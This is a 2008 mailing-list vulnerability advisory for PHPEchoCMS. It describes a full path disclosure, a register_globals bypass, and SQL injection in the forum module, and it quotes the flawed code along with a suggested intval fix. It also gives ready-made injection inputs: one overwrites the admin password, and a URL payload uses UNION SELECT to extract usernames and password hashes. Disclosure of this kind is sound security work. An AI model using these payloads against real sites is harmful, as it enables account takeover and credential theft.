PHPEchoCMS Multible remote vulnerabilitis

Thu, 17 Jan 2008 07:58:12 -0800 

Hello,,


PHPEchoCMS Multible remote vulnerabilitis


Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : [EMAIL PROTECTED]



fiest thing ..

full path

kernel/init.php

modules/admin/index.php

..

every file to be included has to have the value of the variable $BASE_LOAD

but if the register globals is on then you can use in the browser like this ..

modules/files/index.php?BASE_LOAD=1


it will continue .. and other files too


modules/forum/index.php

lines [31-49]

    if (@$_POST['post']=='thread')

    {

        if (@$_POST['id'] && $_POST['title'] && $_POST['contents'])

        {

                    // Add the thread to the specified section

             $ins = "INSERT INTO `".PREFIX."threads` VALUES ('', 
'".addslashes($_POST['id'])."', '-1', '".addslashes($_POST['title']).

              "', '".str_replace("\n", "<br>", 
addslashes($_POST['contents']))."', '".$_SESSION['username']."','".date("d-m-Y 
H:i")."', '0')";

              $res = query($ins, 1);

              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y 
H:i")." WHERE `id`=".addslashes($_POST['id']);

              $res = query($ins, 1);

              $nb = query("SELECT max(`id`) FROM `".PREFIX."threads`", 2);

              redirect ("index.php?module=forum&show=thread&id=".$nb);

         }

         else

         {

              $content = $mlang['017'];


         }

    }


see

              $ins = "UPDATE `".PREFIX."sections` SET `lastdate`=".date("d-m-Y 
H:i")." WHERE `id`=".addslashes($_POST['id']);


could be modified to an update query by posting value of id as next

id=union update members set password=[value] where id=1


offcourse value here should be md5 hash .. and no brackets so the query will be 
ok :)



lines[138-142]


    elseif (@$_GET['show']=='thread' && $_GET['id'])

    {

             // Show a thread and its replies (child-threads)


            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE 
id=".addslashes($_GET['id']), 4);


replace with

    elseif (@$_GET['show']=='thread' && $_GET['id'])

    {

             // Show a thread and its replies (child-threads)


            $thread = query("SELECT * FROM `".PREFIX."threads` WHERE 
id='".intval($_GET['id'])."'", 4);



exploit

index.php?module=forum&show=thread&id=-1%20union%20select%201,2,3,username,password,username,password,8%20from%20phpecms_users%20where%20id=1/*




# WwW.SoQoR.NeT

Reply via email to